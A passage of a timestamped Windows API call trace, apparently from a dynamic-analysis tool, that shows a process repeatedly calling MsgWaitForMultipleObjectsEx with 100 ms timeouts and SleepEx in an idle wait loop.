(nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.483] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.498] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.607] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.623] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.732] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.748] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.860] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.872] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0273.982] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0273.997] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.107] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.122] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.231] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.247] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.356] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.372] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.481] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.496] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.606] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.621] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.731] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.746] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.855] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.871] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0274.980] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0274.996] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.105] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.120] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.230] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.245] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.355] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.370] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.479] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.495] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.604] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.621] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.730] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.744] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.854] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.869] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0275.979] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0275.994] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.105] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.119] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.228] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.244] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.355] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.369] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.478] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.493] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.603] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.618] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.728] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.743] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.852] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.868] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0276.977] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0276.992] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.102] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.118] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.227] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.242] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.352] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.367] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.476] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.492] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.601] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.616] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.726] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.741] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.851] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.866] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0277.975] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0277.991] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.101] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.116] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.228] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.245] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.350] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.365] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.475] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.490] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.599] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.615] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.725] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.740] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.849] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.864] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0278.974] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0278.989] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.099] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.114] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.223] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.239] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.348] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.364] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.473] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.489] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.598] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.613] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.723] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.738] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.849] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.863] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0279.972] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0279.988] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.097] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.112] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.222] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.237] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.347] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.362] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.471] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.487] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.599] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.612] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.731] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.736] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.846] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.861] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0280.971] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0280.986] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.096] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.111] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.220] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.235] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.345] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.360] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.470] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.485] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.595] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.610] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.720] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.737] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.844] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.859] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0281.969] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0281.984] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.097] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.109] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.219] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.234] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.343] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.359] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.468] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.484] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.593] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.608] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.718] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.742] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.843] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.858] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0282.967] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0282.983] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.093] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.108] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.217] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.232] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.342] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.357] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.467] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.482] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.592] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.607] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.716] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.732] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.841] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.858] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0283.966] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0283.981] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.091] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.106] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.215] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.231] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.340] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.356] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.465] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.480] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.590] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.605] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.715] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.735] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.839] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.855] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0284.966] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0284.980] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.089] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.105] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.214] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.229] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.339] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.357] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.463] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.479] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.588] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.604] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.713] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.728] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.838] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.853] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0285.963] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0285.978] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.088] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.103] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.212] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.228] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.337] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.352] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.462] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.477] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.587] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.603] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.711] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.727] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.836] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.852] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0286.961] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0286.976] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.086] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.101] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.211] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.226] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.335] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.351] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.460] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.476] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.585] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.601] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.710] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.725] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.835] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.850] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0287.959] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0287.975] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.084] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.100] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.209] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.224] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.334] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.350] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.459] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.474] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0288.584] SleepEx (dwMilliseconds=0x1, bAlertable=1) returned 0x0 [0288.599] 